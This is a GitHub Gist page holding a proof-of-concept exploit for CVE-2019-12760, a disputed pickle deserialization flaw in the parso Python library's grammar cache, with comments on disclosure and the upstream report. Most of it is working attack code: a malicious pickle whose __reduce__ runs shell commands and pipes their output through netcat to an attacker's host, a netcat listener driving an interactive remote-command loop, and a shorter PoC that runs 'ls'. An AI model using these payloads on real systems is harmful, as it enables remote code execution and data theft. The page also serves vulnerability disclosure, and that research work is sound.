Skip to content

Instantly share code, notes, and snippets.

@dhondta
Last active February 16, 2022 08:13
Show Gist options
  • Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)

Description

** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."

References

#!/usr/bin/python
import parso
import pickle
import random
import shutil
import threading
from hashlib import sha256
from os import makedirs, remove, system
from os.path import dirname, exists, join
from six import b, u
from subprocess import Popen, PIPE
from sys import version_info as v
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.0"
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)"
__doc__ = """
This Proof-of-Concept exploit leverages cache loading of the parso library.
It requires the attacker to be able to create a folder and to write files on
the target. It guesses the path to a cache file, writes an evil pickled object
to it and, while triggering grammar loading, makes the vulnerable application
load the evil pickle to allow Arbitrary Code Execution.
"""
# ------------------------- FUNCTIONS TO BE CUSTOMIZED -------------------------
def get_payload(command, lhost, lport):
# TODO: implement here the logic to send remote command result to attacker's
# host (i.e. if Netcat is not present on the remote server)
class PoC(object):
def __reduce__(self):
return (system, ("{} | nc -n {} {} -w 1"
.format(command, lhost, lport), ))
return pickle.dumps(PoC())
def remove_from_target(host, port, abspath):
# TODO: implement here the logic to remove a file from the remote server
remove(abspath)
def trigger_grammar_processing(dummy_path, cache_path):
# TODO: implement here the logic to trigger grammar processing by parso on
# the remote server
g = parso.load_grammar()
try:
g.parse(path=dummy_path, cache=True, cache_path=cache_path)
except:
pass
def write_to_target(host, port, abspath, content=""):
# TODO: implement here the logic to write a file to the remote server
d = dirname(abspath)
if not exists(d):
makedirs(d)
with open(abspath, 'wb') as f:
f.write(b(content))
logger.debug("> File written to '%s'" % abspath)
# ----------------------------- STATIC FUNCTIONS -------------------------------
class Listener(object):
def __init__(self):
self.state = 1
self.thread = threading.Thread(target=self.run)
self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True}
def run(self):
global args
last_lport = args.lport = 0
while True:
if self.state == 0:
break
while args.lport == last_lport:
args.lport = random.randint(12345, 45678)
logger.debug("Starting new listener on port {}".format(args.lport))
self.args = ("nc -nlvp {}".format(args.lport), )
out, _ = Popen(*self.args, **self.kwargs).communicate()
try:
print(out.decode('utf-8'))
except:
print(u(str(out)))
last_lport = args.lport
def cache_filepath(cache_path, python_implem, dummy_path, version):
# we take the hash from the grammar on the local host, thus assuming it is
# the same as target's one given Python's version
_ = dirname(parso.__file__)
_ = join(_, "python", "grammar%s.txt" % version)
h = sha256(open(_).read().encode("utf-8")).hexdigest()
p = sha256(dummy_path.encode("utf-8")).hexdigest()
_ = "%s/%s-%s-%i/%s-%s.pkl" % (cache_path, python_implem, version,
parso.cache._PICKLE_VERSION, h, p)
logger.debug("> Cache path: %s" % _)
return _
def start_shell():
global args
logger.debug("Starting shell...")
h, p, l = args.rhost, args.rport, args.lhost
i, v, r = args.implem, args.python, args.rdir
listener = Listener()
listener.thread.start()
cnt = 0
while True:
d = join(r, "dummy{}".format(cnt))
write_to_target(h, p, d)
cpath = cache_filepath(r, i, d, v)
try:
cmd = raw_input("> ")
except:
cmd = input("> ")
cmd = cmd.strip()
if cmd == "":
continue
elif cmd in ["exit", "quit"]:
listener.state = 0
logger.debug("Killing Netcat instances...")
Popen("killall -9 nc", shell=True)
logger.debug("Joining Netcat thread...")
listener.thread.join(1)
logger.debug("Removing artifacts...")
shutil.rmtree(args.rdir)
return
write_to_target(h, p, cpath, get_payload(cmd, l, args.lport))
trigger_grammar_processing(d, r)
remove_from_target(h, p, cpath)
remove_from_target(h, p, d)
cnt += 1
# -------------------------- SCRIPT'S EXECUTABLE PART --------------------------
if __name__ == '__main__':
global args
target = parser.add_argument_group("Target options")
target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso",
help="cache absolute folder")
target.add_argument("-i", "--implem", default="CPython",
choices=["CPython", "IronPython", "Jython", "PyPy"],
help="platform Python's implementation")
target.add_argument("--rhost", default="127.0.0.1",
help="local host address")
target.add_argument("--rport", default=80, type=int,
help="local host port")
target.add_argument("-p", "--python", default="36",
help="Python major and minor version digits")
payload = parser.add_argument_group("Payload options")
payload.add_argument("--lhost", default="127.0.0.1",
help="local host address")
initialize()
start_shell()
@iamleot
Copy link

iamleot commented Jun 7, 2019 via email

@dhondta
Copy link
Author

dhondta commented Jun 7, 2019

Have you then recontacted him before CVE-2019-12760 was published?

Not yet, as I'm busy with other matters. I published this as a Gist for the records, also because it's kind of timed out regarding reponsible disclosure and for what it's worth.

In any case I think it would be better to fill a public issue upstream now that the problem is public. Can you please fill it?

You're right, I will open an issue on the related GitHub repo soon.

@iamleot
Copy link

iamleot commented Jun 15, 2019

JFTR this was reported upstream via davidhalter/parso#75.

Thank you!

@dhondta
Copy link
Author

dhondta commented Jun 18, 2019

Simpler proof-of-concept script:

#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b

__author__ = "Alexandre D'Hondt"

print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
    f.write(b(""))
print("   > %s" % dummy)
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
    pyversion,
    parso.cache._PICKLE_VERSION,
    sha256(open(grammar).read().encode("utf-8")).hexdigest(),
    sha256(dummy.encode("utf-8")).hexdigest()
)
print("   > %s" % cache)
d = dirname(cache)
if not exists(d):
    makedirs(d)
print("\n3. Writing a evil cache file (with a pickle payload)...")
class PoC(object):
    def __reduce__(self):
        return (system, ("ls", ))
with open(cache, 'wb') as f:
    f.write(pickle.dumps(PoC()))
print("   > done")
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
    print("\nCommand's result:\n")
    g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception as e:
    pass

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment